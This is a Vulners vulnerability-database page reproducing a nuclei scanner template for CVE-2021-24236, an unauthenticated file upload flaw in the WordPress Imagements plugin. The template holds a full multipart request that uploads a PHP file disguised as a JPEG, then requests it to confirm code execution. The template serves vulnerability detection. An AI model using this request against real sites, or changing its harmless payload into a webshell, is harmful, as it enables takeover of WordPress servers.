Lucene search
K

WordPress Imagements <=1.2.5 - Arbitrary File Upload

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 63 Views

WordPress Imagements <=1.2.5 - Arbitrary File Upload, allows remote code executio

Related
Refs
Code
id: CVE-2021-24236

info:
  name: WordPress Imagements <=1.2.5 - Arbitrary File Upload
  author: pussycat0x
  severity: critical
  description: |
    WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.
  impact: |
    This vulnerability can lead to remote code execution and compromise the affected WordPress site.
  remediation: |
    Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability.
  reference:
    - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea
    - https://wordpress.org/plugins/imagements/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24236
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24236
    cwe-id: CWE-434
    epss-score: 0.0714
    epss-percentile: 0.93501
    cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: imagements_project
    product: imagements
    framework: wordpress
  tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project,vuln

variables:
  php: "{{to_lower('{{randstr}}')}}.php"
  post: "1"
  string: "CVE-2021-24236"

http:
  - raw:
      - |
        POST /wp-comments-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="author"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="email"

        {{randstr}}@email.com
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="url"

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="checkbox"


        yes
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="naam"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="image"; filename="{{php}}"
        Content-Type: image/jpeg

        <?php echo md5("{{string}}");unlink(__FILE__);?>

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="submit"

        Post Comment
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_post_ID"

        {{post}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_parent"

        0
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--
      - |
        GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'
# digest: 490a0046304402201ca29d7a5355facb7ee3339c0d86bdfdb8c84d11cc6413a20ed8d6294aa7eda90220484f4911dca0e66949f5439e9c13ff32c3cdb6bd2e3976c6066ddba4e55e5e8f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 27.5
CVSS 3.19.8
EPSS0.0714
63